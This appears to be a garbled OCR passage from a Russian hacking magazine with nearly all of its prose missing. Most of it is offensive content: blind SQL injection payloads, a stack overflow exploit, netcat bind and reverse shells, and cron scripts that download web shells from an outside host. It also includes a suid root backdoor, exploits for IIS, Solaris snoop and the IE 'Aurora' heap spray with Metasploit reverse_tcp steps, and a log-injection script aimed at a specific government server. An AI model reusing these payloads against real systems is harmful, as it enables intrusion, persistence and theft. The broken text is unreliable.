getsystem. , , , , .
ps :
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
370 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
...
1558 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
...

, explorer.exe
PID=1560. ,
, ,
steal_token. PID :
meterpreter > steal_token 1558
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user

Server username,
.

,
.
#GP ( nt!KiTrap).
-
. , BIOS',
32- x86-
16- .
16- (%windir% \
twunk_16.exe), NtVdmControl(),
Windows Virtual DOS Machine (aka
NTVDM),
#GP .
,
,
32- . 64-
16- .

?
Microsoft ,
.
.
, , , .
,
:)? z

STEP TWITTER.COM/STEPAH


, 8 2005 ,
Google
Maps. , -
, .
,
, , ,
. :
API ,
,
, ,

Streets View.


360 .
, Google
, , ,
,
:). ...
,
- . ,

!-, Bird's Eye Microsoft Bing (www.bing.com/maps).
, ?
,

, , ,
, . Bird's Eye ( ) .
, 45
,
,


,
, .
,
, ,
SimCity. ,
-!
- ,
GoogleStreet's,

DualMaps (www.mapchannels.
com/dualmaps.aspx). , API bing.com/
developers. ,
, ,
80 ,
Pictometry,
.

-, ,
SAS. (sasgis.
ru/sasplaneta),
, ,
Bing' .
,
Google, Yahoo (

Eniro: www.eniro.com). !
,
Googlebuildingmaker (sketchup.google.
com/3dwarehouse/buildingmaker),

3D- . ,
3D-?
!
,
,

. Google, ,
,
, 4-
, 3D-
(
). (,
) ,
GoogleEarth (earth.
google.com/intl/ru) .
.
, GoogleMaps, 5
, .
- Silverlight,
VirtualEarth,
:). z



Spyder spyder@antichat.net
komarov@itdefence.ru

Easy Hack
1

:
SQL-INJECTION

:
. , , ,
. , :
<?php
if(isset($_GET['id']) && $_GET['id']!=''){
$replaced = preg_replace('/,/','',$_GET);
....
- $replaced

? union
select, 2- . , ,
. ,
substring(), mid(), ExtractValue(),
Qwazara
. ? SQL-, LIKE.
:
id=1 and version() like '4%'--

, , , 4*. :
id=1 and version() like '5%'--

, ,
id=1 and 1=1--

, . ,
, , .
information_schema.tables;
, ,
:
id=1 and (select 1 from information_schema.columns where
column_name like '%pass%' and table_name like 'u%')--

%pass% ,
table_name. ,
:
id=1 and (select 1 from information_schema.columns where
column_name like '%pass%' and table_name like 'us%')--

. , users
username, password,id. :
id=1 and (select 1 from users where id=1 and password like
'q%')--

. %
LIKE , q 1
.

:

BUFFER OVERFLOW

:
, , -
, .
, . ,
:
#include "stdio.h"
#include "string.h"
/* Deliberately vulnerable: copies s into a 12-byte buffer with no length check */
void return_input (char *s) {
    char array[12];
    strcpy(array,s);
    printf("%s\n", array);
}
void text () {
    printf("Example\n");
}
int main ( int argc, char *argv[] ) {
    text();
    return_input(argv[1]);
    return 0;
}

array 12
, . 30 :
spyder@l33t:~/c> ./bof AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAA
Example
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(core dumped)

:
spyder@l33t:~/c> gdb bof core
............................
Core was generated by './bof AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA'.

pcap-

Bindshell Windows
Vista/7

Program terminated with signal 11, Segmentation fault.


#0 0x41414141 in ?? ()

0x41 (A) ebp eip. eip , ,


. eip .
text() .
:
spyder@l33t:~/c> gdb bof
(gdb) disas main
Dump of assembler code for function main:
0x0804848d <main+0>: push %ebp
0x0804848e <main+1>: mov %esp,%ebp
0x08048490 <main+3>: and $0xfffffff0,%esp
0x08048493 <main+6>: sub $0x10,%esp
0x08048496 <main+9>: call 0x8048479 <text>
0x0804849b <main+14>: mov 0xc(%ebp),%eax
0x0804849e <main+17>: add $0x4,%eax
0x080484a1 <main+20>: mov (%eax),%eax
0x080484a3 <main+22>: mov %eax,(%esp)
0x080484a6 <main+25>: call 0x8048454 <return_input>
0x080484ab <main+30>: mov $0x0,%eax
0x080484b0 <main+35>: leave
0x080484b1 <main+36>: ret

text
0x08048496 <main+9>: call 0x8048479 <text>
0x08048496.
0x08048496.
12 , , 4
, ebp, , , 4 ,
eip. gcc ,
6 . :

:
,

:
sla.ckers.org
Paic , ,
NOT NULL. , ,
:
id=1 and (select * from users) = (1)

MySQL Operand should contain 7 column(s).


, users 7 . :

char stuff[]= "AAAAAAAAAAAAAAAAAAAAAAAA\x96\x84\x04\x08";
execlp("./bof","./bof",&stuff,NULL);
}

LIFO (Last In First Out, ),


. :
spyder@l33t:~/c> ./eip
Example
AAAAAAAAAAAAAAAAAAAAAAAA??
Example

, text() ,
, .

main () {

IP ,

id=1 and (1,2,3,4,5,6,7) = (select * from users union select


1,2,3,4,5,6,7 limit 1)

. ,
.
%0 , NOT NULL,
. :
id=1 and (1,2,3,4,5,6,7) =
(select * from users union select 1%0,2,3,4,5,6,7
limit 1)

Column id cannot be null.


:
, root.
- ,
PHP-. . :

system()
passthru()
exec()
shell_exec()
pcntl_exec()
eval()

: OpenSSH .
OpenSSH ShadOS, , , ,
. suid.c, :

,
:
assert()
preg_replace() c e
$a($b)
usort()

, -.
- , joomla, wordpress vbulletin,
. PHP .
, images ,
.jpg. .gif-!
.htaccess :

#include <stdio.h>
int main(int argc, char **argv){
system(argv[1]);
}

gcc suid.c -o suid. ( )


suid-. - , .
system().
suid-:
./suid id
uid=30(www) gid=30(www)

- :
chown 0:0 suid;chmod 4755 suid

AddType application/x-httpd-php .gif

www:
.gif- -.
, ?
/etc/shadow,
. ,
, ,
.

: SWEB
PETERHOST

:
, PHP- SQL-. .


./suid id
uid=30(www) gid=30(www) egid=0(root)

uid=30, !
/usr/bin.

1) union select.
Sweb $_GET-; POST, .
Peterhost $_GET, $_POST ,
; union select
, ,
. :

reverse-shell Windows Vista/7

%09
%0a
%0b
%0c
%0d

:
, , //
. .
1) .
( cronshell.php) :
<?php
$file = /home/user/www/shell.php;
if(file_exists($file) == false) {
copy('http://www.h4x0r.com/shell.txt', $file);
}
?>

, , ,
. , , allow_url_fopen
On, system() wget.
2) .
index.php, . index.php
; , .
cronframe.php:
<?php
$frame = ' ';
$frame = preg_quote($file,'/');
$file = file_get_contents('/home/user/www/index.php');
preg_match($frame,$result,$file); //
if ($result == '') { //
system('rm /home/user/www/index.php); //
copy('http://www.h4x0r.com/index.txt', '/home/user/www/
index.php'); //
}
?>

3) .

2) order by.
order by group by,
, , .
, oRdEr bY,
.
3) PHP-injection.
,
, /etc/passwd,
, /etc/
hosts.

<?php
$testfile = '/home/user/www/dors/sitemap.html'; //

if(file_exists($testfile) == false) { //
, ...
system('rm -rf /home/user/www/dors;mkdir /home/user/www/
dors');
copy('http://www.h4x0r.com/dors.tgz',
'/home/user/www/dors/'); //
system('tar xzf /home/user/www/dors/dors.tgz');
//
}
?>

, .
/home/user/ test:
SHELL=/bin/bash
MAILTO=user
0-59 * * * * /home/user/cron.php

: , - , , , ,
, /home/user/cron.php .
, :
crontab /home/user/test

! /var/spool/cron user
:
# DO NOT EDIT THIS FILE edit the master and reinstall.
# (/home/user/test installed on Mon Mar 29 02:31:34 2004)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37
vixie Exp $)
SHELL=/bin/bash
MAILTO=user
0-59 * * * * /home/user/cron.php

/home/user/cron.php .


, ,

FTP-
1. - .pcap:
tcpdump -w test.pcap -i eth1 tcp port 6881 or udp \( 33210 or 33220 \)

:
NMAP, ,
. ,
.
.

: , FTP

:
,
.
!
, FTPXerox v1.0 (members.fortunecity.com/sektorsecurity/

:
NETCAT VISTA

:
, , .
powershell.exe,
cmd.exe , :).
BindShell:
nc -l -e powershell.exe -t -p 666
telnet localhost 666
ReverseShell:
nc -l -p 666
nc -e powershell.exe localhost 666

PowerShell.
, netcat,
:
function Trace-Port([int]$port=23, [string]$IPAdress="127.0.0.1", [switch]$Echo=$false){
    $listener = new-object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Parse($IPAdress), $port)
    $listener.start()
    [byte[]]$bytes = 0..255|%{0}
    write-host "Waiting for a connection on port $port..."
    $client = $listener.AcceptTcpClient()
    write-host "Connected from $($client.Client.RemoteEndPoint)"
    $stream = $client.GetStream()
    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $bytes[0..($i-1)]|%{$_}
        if ($Echo){$stream.Write($bytes,0,$i)}
    }
    $client.Close()
    $listener.Stop()
    write-host "Connection closed."
}

2. rumint (rumint.org),

.

projects/ftpxerox.html). , - ,
.
, . ,
.
,
.

FTP. - .

:
PS> Trace-Port -ip 192.168.1.99 -port 333
Waiting for a connection on port 333...
Now script waiting for connection on port 333. I will connect to
this port using telnet.exe, and then write word "Test" into it:
Connected from 192.168.1.99:61829
84
101
115
116
13
10
Connection closed.

, test-, . z


KOMAROV@ITDEFENCE.RU / IT DEFENCE.RU

, , ,
, . , , ,
- , .
. ,
.

CLIENTLESS VPN SSL

01

CISCO VPN SSL

BRIEF CISCO VPN SSL CISCO ASA CISCO, . VPN-,



.
EXPLOIT CISCO VPN Clientless ,
VPN
. . CISCO
, ,
, ,
.
,
/Intranet-, . ,
http://intranet. ,
:
1) ROT13 uggc://vagenarg.
2) ASCII- HEX
756767633a2f2f766167656e617267.
3) https://[CISCOVPNSSL]/+CSCO+0075676
7633a2f2f766167656e617267++.
! :
#!/bin/bash
echo -n "write URL:"
read a
b=`echo -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m]
[N-Z][A-M]' | od
-tx1 | cut -c8- | sed 's/ //g'` | paste -s -d '';
echo -n "URL "


CLIENTLESS CISCO VPN-

echo -n "https://[CISCOVPNSSL]/+CSCO+00";; echo -n $b;


echo -n "++";
echo "";

SOLUTION ACL- (webtype/


filter), Cisco Understanding Features
NotSupported in Clientless SSL VPN.
TARGETS Cisco ASA <= 8.x.

02


MICROSOFT IIS

BRIEF WEB- Microsoft.


ASP-
,
, . .
EXPLOIT IIS :
.asp;.gif, .asp;.jpg, .asp;.exe.
, ; .
, , , ,
(, ), WEB

SHELLCODE'A ,
ASCII

- . Backtrack
,
(backtrack.it/~emgent/exploits/
IIS-asp.py):

XDOTOOL ,
. ,

./IIS-asp.py <image.jpg> < shellcode>

, - 0 shell_bind_
tcp, 1 meterpreter_bind_tcp, 2 vncinject_bind_tcp, ,
payloads Metasploit.
root@andrej:/tmp# ./IIS-asp.py image.jpg 0

image.asp;.jpg,
WEB-. , .
, , ,
(, images, avatars, uploads).
:
http://127.0.0.1/images/image.asp;.jpg
root@andrej:/tmp# nc -vv 10.12.6.6 31337
# Zerbion [10.12.6.6] 31337 (?) open
#
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# c:\windows\system32\inetsrv>whoami
> nt authority\network service

03


BLENDER

BRIEF Blender (blender.org) 3D- ,


, , !
,
. ,
( .blend) .
EXPLOIT Blender (Text Editor),
, New. , Python, :
import os
os.system("calc.exe")

Text Name (TX:Text.001) TX:myscript. Buttons


Window, (panel) Script,
, enable script links . New,
(myscript). OnLoad.
, User Preferences File Save.

TARGETS Blender 2.49b, Blender 2.40, Blender 2.35a, Blender 2.34.

SOLUTION .

SOLUTION ,
.
.blend- SDNA Scriptlink (http://www.atmind.nl/blender/blender-sdna.html#struct:ScriptLink),
.

TARGETS Microsoft Internet Information Services (IIS) 5.x/6.x.

04

LINUX- SKYPE

BRIEF
Skype ( ). , ,
(design error). Linux, GUI-
QT (qt.nokia.com/products).
EXPLOIT
1. pseudo-XSS.
HTML - , . , ,

, , . "><h1><" ,
, . ? ,
, , , . ,
. ,
XSS, , ,
,
, , phishing-:
akep.ru">! .>


google.it, !
, .
, XSS-.
2. Denial Of Service 100%. xdotool (semicomplete.com/projects/xdotool)
.


Linux/FreeBSD, , , - .
, Windows (Automize).
Skype, xdotool ,
, :
sleep 5 && xdotool type "`perl -e "print 'S 'x44801"`" && xdotool key Return
sleep 5 && xdotool type 's/../' && xdotool type "`perl -e "print 'S 'x44801"`" && xdotool type '/' && xdotool key Return

, 0x44801 .
-
. .
SMS , 89601-.

TARGETS
<=2.1 Beta.
SOLUTION
.

05


SUN SOLARIS (SNOOP)

BRIEF snoop (docs.sun.com/app/docs/doc/819-2240/snoop1m?a=view) SUN Solaris. Snoop


, tcpdump/ethereal.
, , , ,

WEB-
SOLARIS SNOOP !


. Wireshark:
CVE-2006-3627 GSM BSSMAP
CVE-2009-3243 TLS
CVE-2009-3550 DCERPC-
CVE-2009-3829 wiretap/erf.c

, . - ,
,
. SMB-
(src/cmd/cmd-inet/usr.sbin/snoop/snoop_smb.c).
:
06 static void
07 interpret_negprot(int flags, uchar_t *data, int len, char *xtra)
08 {
09     int length;
10     int bytecount;
11     char dialect[256];
12     ...
13     protodata = (uchar_t *)data + sizeof (struct smb);
14     protodata++; /* skip wordcount */
15
16     if (smbdata->flags & SERVER_RESPONSE) {
17         ...
18     } else {
19         /*
20          * request packet:
21          * short bytecount;
22          * struct { char fmt; char name[]; } dialects
23          */
24         bytecount = get2(protodata);
25         protodata += 2;
26         if (flags & F_SUM) {
27             while (bytecount > 1) {
28                 length = sprintf(dialect, (char *)protodata+1);
29                 protodata += (length+2);
30                 bytecount -= (length+2);
31             }

16, , , SMB ,
else (get2()).

(27), F_SUM.
(dialect) sprintf.
256 ,
.


, !

EXPLOIT milw0rm.org/exploits/6328.
:
attack:/exploits# ./hoagie_snoop -t 192.168.0.1
* [*] attacking 'SunOS opensolaris 5.11 snv_86 i86pc i386 i86pc' on '192.168.0.1' ...
* [*] execute 'uname -a > /tmp/.patch.your.system.txt' now ...
* [*] done
attack:/exploits#

, :
admin@opensolaris:~# snoop port 445
* Using device pcn0 (promiscuous mode)
* sh[1]: i??SMBr: not found [No such file or directory]
* WARNING: received signal 11 from packet 1
admin@opensolaris:~# cat /tmp/.patch.your.system.txt
* SunOS opensolaris 5.11 snv_86 i86pc i386 i86pc Solaris
admin@opensolaris:~#


!
, . :
s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if (s == -1) {
    printf("[*] failed to create raw socket\n");
} else {
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.s_addr = inet_addr(target);

    if (!command) {
        command = "uname -a > /tmp/.patch.your.system.txt";
    }

    printf("[*] attacking '%s' on '%s' ...\n",
        targets[idx].description, target);


, , snprintf:
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;

/* length */
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;

/* 4 */ ( , GCC )
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;

/* ebp */
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;

/* (system())*/
buffer[i++] = targets[idx].address & 0xff;
buffer[i++] = (targets[idx].address >> 8) & 0xff;
buffer[i++] = (targets[idx].address >> 16) & 0xff;
buffer[i++] = (targets[idx].address >> 24) & 0xff;

, :
    printf("[*] execute '%s' now ...\n", command);

    send_smb_packet(s, &sin, SMB_COMMAND_TRIGGER, buffer);

    printf("[*] done\n");

    close(s);
}

return 0;
}

SMB 0X72

snprintf(buffer, sizeof(buffer), ";%s;", command);

/* char dialect[256] */
for (i = strlen(buffer); i < 256; i++) { buffer[i] = SMB_HEADER_FILLER; }

dialect .
EIP :

/* bytecount*/
buffer[i++] = SMB_HEADER_FILLER;
buffer[i++] = SMB_HEADER_FILLER;

TARGETS
Sun Solaris 8/9/10.
OpenSolaris < snv_96.
SOLUTION

snprintf:
1
2
3
4
5
6
7
8
9

+
+
+
+

while (bytecount > 1)


{
length = sprintf(dialect, (char *)protodata+1);
length = snprintf(dialect, sizeof (dialect),
"%s", (char *)protodata+1);
protodata += (length+2);
if (protodata >= data+len)
break;
bytecount -= (length+2);
}
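
Review bot: the added `snprintf(dialect, sizeof (dialect), "%s", (char *)protodata+1)` bounds the write into `dialect`, but `%s` still reads from `protodata+1` until it meets a NUL, so a dialect string with no terminator inside the packet is read past `data+len` before the new `if (protodata >= data+len) break;` check runs. snprintf also returns the length the untruncated string would have had, so `length` is still driven by packet contents rather than by the buffer size. Suggest limiting the read to the bytes left in the packet (for example a `%.*s` precision computed from `data+len` and `protodata`) and rejecting a negative `length` before `protodata += (length+2)`.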



Step step@glc.ru

GOOGLE
.

GOOGLE, MCAFEE, ADOBE .
:). ,
, .
INTERNET EXPLORER,
, .


,
.
,
(-), .
- IE,
Heap Spraying.
.

HEAP SPRAYING

, ,
Heap Spraying.
.
,
( IE)
- ,
.
0x7fffffff,

,
. Heap Spraying.
, , -
(- Heap), ?
.
(
, , ,
),
: . , ,
,
, ,
.
,
.
, ,
, -:

.
-, - ?
. ,

NOP-,
, -.

NOP',
NOP ,
,
. NOP' -,
!
Heap
Spraying. :
? ,
,
.
JS-,
. ,
, ,

.
, ,
, Aurora,

.

JavaScript, , ,
. , ,
, JS-
.
:
<script>
var c = document
var b = "60 105 ... 62 14 10 "
var ss = b.split(" ");
var a = "a a a ... | } ~ "
var s=a.split(" ");
s[32]=" "
cc = ""
for(i=0;i<ss.length-1;i++) cc += s[ss[i].valueOf()-i%2];
var d = c.write
d(cc)
</script>


.
JS-
b.
,

,
a. , :
<html>
<script>
var sc = unescape("%u9090 [...] 6%ubfa8%u00d8");
var sss = Array(826, 679, [...] 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ )
{
    arr[i] = String.fromCharCode(sss[i]/7);
}
var cc=arr.toString();cc=cc.replace(/,/g, "");
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i < 200; i ++ ){
    x1[i] = document.createElement("COMMENT");
    x1[i].data = "abc";
};
var e1 = null;
function ev1(evt){
    e1 = document.createEventObject(evt);
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 50);
}
function ev2(){
    p = "\u0c0d\ [...] \u0c0d";
    for (i = 0; i < x1.length; i ++ )
    {
        x1[i].data = p;
    };
    var t = e1.srcElement;
}
</script>
<span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span>
</body></html>

IE ,
ECX

INTERNET EXPLORER

HTTP://WWW
links

NOPslide:
www.phreedom.org/solar/honeynet/scan20/scan20.html.
Microsoft:
www.microsoft.com/technet/security/bulletin/MS10-002.mspx.

WARNING

info
.


.
.

, Heap Spraying,
. n,
NOP- 0D 0C (, ,
,
). , NOP- n ... - sc.
,
, Heap
Spraying! , .
, , ,
,
. -
Internet Explorer, .

:
sc, - . ,
.

, sss.
var sss = Array(826, 679, [...] 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ )
{
arr[i] = String.fromCharCode(sss[i]/7);
}
var cc=arr.toString();cc=cc.replace(/,/g, "");
cc = cc.replace(/@/g, ",");
eval(cc);


: sss sss[i]/7,
fromCharCode
Unicode-. cc,
,
eval(cc) :
var n = unescape("%u0c0d%u0c0d");
while (n.length <= 524288)n += n;
n = n.substring(0, 524269 - sc.length);
var x = new Array();
for (var i = 0; i < 200; i ++ ){
x[i] = n + sc;
}

var x1 = new Array();


for (i = 0; i < 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
};
var e1 = null;

200 COMMENT,
.data abc.
, . ,
,

:
<span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span>

HTML- <span>,
<img>, aaa.gif (
). , , onload (,

),
ev1. , :
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
}

-
event,

PYTHON !

!
onload <img>. :
innerHTML <span>.
<img>, ,
.
, ev2() 50 .
function ev2(){
p = "\u0c0d\ [...] \u0c0d";
for (i = 0; i < x1.length; i ++ )
{
x1[i].data = p;
};
var t = e1.srcElement;
}
</script>

, ! ,
x1 ,
COMMENT, . .data. p,
x1, ,
Heap Spraying.
? ! , ,
.data, ,
, . , ? ( !) <img>,
. , <img>
, , , .

(HEAP)
.
NOP No OPeration,
, .

, ,
. .
ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) .
,
,
.


.data ,
, - (heap').
? , <img>! , <img> , .
, 0x0C 0x0D? :
0x0C0D0C0D,
-,
Heap Spraying'. , ,
. e1:
var t = e1.srcElement;
srcElement ,
e1. <img>,
span innerHTML. IE
- ,
. ,
0x0C0D0C0D, , , Heap Spraying'. :
-, .

GOOGLE?

Internet Explorer,
. (- Google
..), . -,
, Hex-Rays.
Svchost.exe .
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\, HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Svchost. SysIns.
%System%\rasmon.dll
serviceDLL , :
C:\Windows\System32\svchost.exe -k SysIns
rasmon.dll . ,
,
, .
.
.
RaS[4 ] (, RaSxake),
serviceDLL netsvcs.
svchost.
W32.Downadup, -


METASPLOIT'
.
, ,
.
, , ,
.
-

, , , ,

.


Wepawet (wepawet.iseclab.org).
Metasploit,

, ,
.
Metasploit
(www.metasploit.com/framework/download)
-
. ,

msfconsole,
.
ie_aurora,
IE, :

1. :
msf > use exploit/windows/browser/ie_aurora

2. -, ..
,

.
backconnect (
):
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp

3. backconnect' ,

:
msf exploit(ie_aurora) > set LHOST _IP

4. URIPATH
, HTML- (
):
msf exploit(ie_aurora) > set URIPATH /
5. , , :
msf exploit(ie_aurora) > exploit



IP-:
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.23:8080/
[*] Server started.

,
Internet Explorer 6 ( Windows
XP SP3)
, Local IP
(http://192.168.0.23:8080). ,
(backconnect'):
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.23:4444 -> 192.168.0.97:1514)

: . ,
,
, , :
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Testlab\Desktop>

[Figure: HEAP SPRAYING, NOP' + -. Labels in the diagram: LOW ADDRESS TO 0X00000000, HEAP, OTHER STRUCTURES, HEAP SPRAY, Injected Heap, NOP + SHELLCODE, INVALID MEMORY, 96AB0000, JUMP HERE 3C0DFF7D, HIGH ADDRESS TO 0X7FFFFFFF.]

! ,

Python' (praetorianprefect.com/wp-content/uploads/2010/01/ie_aurora.py_.txt),
-
HTML : python ie_aurora.py [
].
-, (calc.exe).

IE6?

Internet Explorer.

IE8 . ,
Internet Explorer 8 ( , ) DEP (Data Execution Prevention)

. ,
,
.


WEPAWET

DEP
,

. , security- Vupen
(www.vupen.com/exploits) ,
DEP IE8,
.
Microsoft, proof-of-concept , , Windows Vista
-

Address
Space Layout Randomization (ASLR).
: ? Aurora


, .


.
Hydraq. z



ARTEMBARANOV@YANDEX.RU


TDL3

, , , TDL3
TDSS.
,
. ,
TDL3,
.

rootkit.com diablonova
(rootkit.com/blog.php?newsid=970)

TDL, , ,
.
- ,
.
,
, -
; atapi.sys, disk.sys.
,
.
, .
atapi.sys,

. ,

.
IRP - atapi
: -
.


AV ,
,

. . -
DrWeb
Backdoor.Tdss.565 (aka TDL3) (drweb.com/static/BackDoor.Tdss.565_(aka%20TDL3).pdf), TDL3 .
.
thug4lif3 rootkit.com (rootkit.com/newsread.php?newsid=979),
.
Rustock.C,
, TDL3

,

. TDL3
, ,
.

;
offensivecomputing.net malwarebytes.org,
, ,
.


, .
,
, , .
,
Windows XP SP3, , Windbg, , IDA .
non-debug , . ,
, debug .
,
debug out This is your life,
and it's ending one minute at a time.
DrWeb.

-, Disable
acceleration for binary translation .
, tdss.565
.
, , ,
- - (
atapi.sys). , , !devstack \device\harddisk0\dr0.
-.
- (
,
.reload atapi.sys).
:
kd> u f9756b3a l3
atapi!PortPassThroughZeroUnusedBuffers+0x34:
f9756b3a mov eax,dword ptr ds:[FFDF0308h]
f9756b3f jmp dword ptr [eax+0FCh]
f9756b45 add byte ptr [eax],al

, : TDL3

(,
IRP - ).

,
0xFFDF0308. -, ,
KUSER_SHARED_DATA, ,
(, ) . ,
.
.
struct _TAIL_PARAM_BLOCK
{
    PVOID pTailInMem; //+0,
    PVOID KernelBaseAddress; //+4,
    PVOID MountedVFSDeviceObject; //+8, atapi, VFS
    PVOID Unknown1; //+C
    ULONG TailDiskOffsLow; //+10, ULONGLONG,
    ULONG TailDiskOffsHigh; //+14
    ULONG numOfValidSectorInHideArea; //+18,
    FAST_MUTEX FastMutex; //+1C
    ULONG TailStartDiskSector; //+3C, LBA
    ULONG HideAreaStartSector; //+40, LBA
    UCHAR szBotId[36]; //+44,
    ULONG Unknown2; //+68
    ULONG Unknown3; //+6C
    ULONG Unknown4; //+70
    ULONG Unknown5; //+74
    ULONG Unknown6; //+78
    ULONG Unknown7; //+7C
    ULONG Unknown8; //+80
    ULONG Unknown9; //+84
    ULONG Unknown10; //+88
    ULONG OrigAtapiFuncs[0x1C]; //+8C, -
    PVOID RootkitDispatchFunc; //+FC, -
    PVOID AtapiDriverObject; //+100
    PVOID AtapiBootRootkitDevObj; //+104, - - ,
    ULONG SectorSize; //+108
    PVOID pKernel32_LoadLibraryExA; //+10c,
    ULONG cEntryInHideAreaTable; //+110,
    struct
    {
        ULONG SectorStart;
        ULONG OffsFromSector;
        ULONG RestoreDataSize;
        PVOID pOrigData;
        ULONG unknown;
    }
    HideAreaEntry[7]; //+114
    ULONG unknown11[45]; //+1A0
    WCHAR DirSignature[9]; //+254,
    WCHAR DirFullPath[30]; //+266,
    ...
}

, :
,
, ,
-.
.

IDA.
. -, .
TDL3,


DEVSTACK, - \DRIVER\
ATAPI DISK.SYS.

- ,
, ATAPI
, .
RootkitDispatchFunc
( 818e2e31) TDL3.
0x5E00
(
), ,
.writemem D:\1.bin 818df000 l5e00. :
- atapi.sys,
OrigAtapiFuncs
, , DiskExplorer.
m,
;
m poi(FFDF0308)+8C l70 81957548+38,
81957548 atapi.
atapi.sys
. , -

TDL3

,
. .
TDL3


DLL
EXPLORER
PEB
,
TailStartDiskSector.
, atapi.sys. -

,
,
.
,
, .
,
-
IRP . dd poi(FFDF0308)+fc l1
, P.

VFS

, , ,
atapi,
IRP_MJ_INTERNAL_DEVICE_CONTROL (aka IRP_MJ_SCSI).
create/
close ,
, FSD,

.
( )
/ PnP
. atapi.sys

create/close ,
STATUS_SUCCESS.
,
( ) ,
, , dll,

(
)
,
. ,
,
\Device\Ide\IdePortX, /
,
,
. , . VFS
white paper DrWeb,
, .
,
0x254
(DirSignature).
(DirFullPath) __ + _ (
\Device\Ide\IdePort1\riyuicvp).
,
, Win32 API \Device\Ide\IdePort1\riyuicvp\tdlwsp.dll. , , ,
dll,
PEB, .

, . ,
- ,
- FILE_DEVICE_CONTROLLER, FS.

,
, -,
( HideAreaEntry).

callback- ,
,
.
,


.
(
). ,
,
.

0X384 ,

.
DriverStartIo DRIVER_OBJECT. , IRP-,
. -
IoStartPacket,
StartIo,
.

,

,


8198ACA2. 8198ACA2-8a243384=F774791E. <Alt-B>
,
1E 79 74 F7.
IRP ,
. : ,
atapi
VFS. ,
,

, .

,
,
.


, ,
. z

STARTIO -,
.
TDSS 3.20

TDL3
, . , ,
. -
atapi , fake-
- ,
, .


GOV


. :
,
, .
, .


.
, .
,
, ,

. ,
,
, ,
(
)? ? ,
,
? :
, .

, , - .
Disturbed Perfect Insanity .

, 15400000 .


.
, The official site
2004, .
, , .
http://site/dir. ,
mode_rewrite,
: http://www.mon.gov.ua/main.
php?query=zno. ,
query query[],
- : ,
. ,
. ,
,
RFI. . ,

,
phpinfo. ,
Local File Inclusion,
-
.
:
http://www.mon.gov.ua/main.
php?query=main.php%00.

,
, . , ,
, .
LFI, Looped DoS.
.
,
. . ,
, ../?

FORBIDDEN.

,
/
proc/self/environ! POST-
User-Agent .
: http://www.mon.gov.ua/main.
php?query=../../../proc/self/environ%00. ,
. !
main.php?query=../../../proc/self/
fd/2%00

?


PROOFLINK

[Sun Nov 15 07:41:42 2009] [error] [client 92.249.112.225] client denied by server configuration: /usr/share/phpMyAdmin/
[Sun Nov 15 08:43:31 2009] [error] [client 65.55.109.220] client denied by server configuration: /usr/share/phpMyAdmin/phpAdsNew, referer: http://xxxx.us/album/thumbnails.php?album=search&search=releases

. ,
. ,
403 Forbidden.
User-Agent ,
Referer, . ,
403.
,
phpMyAdmin. ,
: http://www.mon.gov.ua/
phpMyAdmin,
.
PHP Refereraa:
<?php
$server
=
'212.111.193.189';
$dir
= '/phpMyAdmin/';
$evilcode
= '<?php eval($_
REQUEST[ev]); ?>';
$header
= "GET "
.$dir. " HTTP/1.0\r\n";
$header
.= "Host: "
.$server. "\r\n";
$header
.= "Referer:
" .$evilcode. "\r\n";
$header
.=
"Connection: close\r\n\r\n";
$fp = fsockopen($server, 80);
if(!$fp) { die("[ X ] Connection
failed");} else { echo "[ ~ ]
Connection successful \r\n";}
if(fputs($fp,$header)) {echo "[
~ ] Data sended! \r\n";} else {
die("[ X ] Error While sending
headers!"); }
$result = fgets($fp, 128);

if(strpos($result,'Forbidden'))
echo "[ ~ ] Successful! \r\n";
else die("[ X ] Failed!");
?>

,
, , ,
InetCrack, HttpREQ [x26]VOLAND, FireFox.

, ,
. , :
